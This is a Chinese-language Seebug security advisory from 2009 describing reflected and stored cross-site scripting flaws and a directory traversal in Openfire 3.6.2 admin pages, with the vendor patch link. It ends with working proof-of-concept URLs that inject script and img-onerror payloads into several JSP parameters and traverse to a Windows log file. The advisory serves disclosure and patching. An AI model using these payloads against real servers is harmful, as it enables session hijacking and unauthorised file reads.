Openfire多个跨站脚本和目录遍历漏洞

2009-01-11T00:00:00
ID SSV:4644
Type seebug
Reporter Root
Modified 2009-01-11T00:00:00

Description

BUGTRAQ ID: 32935,32937,32938,32939,32940,32943,32944,32945

Openfire(原名为Wildfire)是一个采用Java开发的跨平台开源实时协作(RTC)服务器。

Openfire的logviewer.jsp文件中没有正确地过滤log参数,group-summary.jsp文件没有正确过滤search参数,user-properties.jsp文件没有正确过滤username参数,audit-policy.jsp文件没有正确过滤logDir、logTimeout、maxDays、maxFileSize和maxTotalSize参数,log.jsp文件没有正确地过滤掉<img>标签,这可能导致反射式跨站脚本攻击。

server-properties.jsp页面未经过滤便显示了属性,muc-room-summary.jsp页面未经过滤显示了在muc-room-edit-form.jsp中编辑的属性,远程攻击者可以通过恶意属性名称执行储存式跨行脚本攻击。

log.jsp中缺少过滤,允许远程攻击者通过目录遍历攻击读取任意.log文件。以下是log.jsp中的有漏洞代码段:

File logDir = new File(Log.getLogDirectory()); String filename = (new StringBuilder()).append(log).append(".log").toString(); File logFile = new File(logDir, filename);

Ignite Realtime Openfire 3.6.2 厂商补丁:

Ignite Realtime

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://www.igniterealtime.org/downloads/index.jsp#openfire target=_blank rel=external nofollow>http://www.igniterealtime.org/downloads/index.jsp#openfire</a>

                                        
                                            
                                                http://vulnsite.com/logviewer.jsp?clearLog=false&amp;emailLog=false&amp;lines=&amp;log=%22/%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&amp;markLog=false&amp;mode=desc&amp;refresh=&amp;saveLog=false
http://vulnsite.com/group-summary.jsp?search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&lt;!--
http://vulnsite.com/user-properties.jsp?username=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
http://vulnsite.com/audit-policy.jsp?maxTotalSize=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&amp;update=Save%20Settings
http://vulnsite.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27javascript:alert(%22xss%22)%27%3E
log.jsp?log=..\..\..\windows\debug\netsetup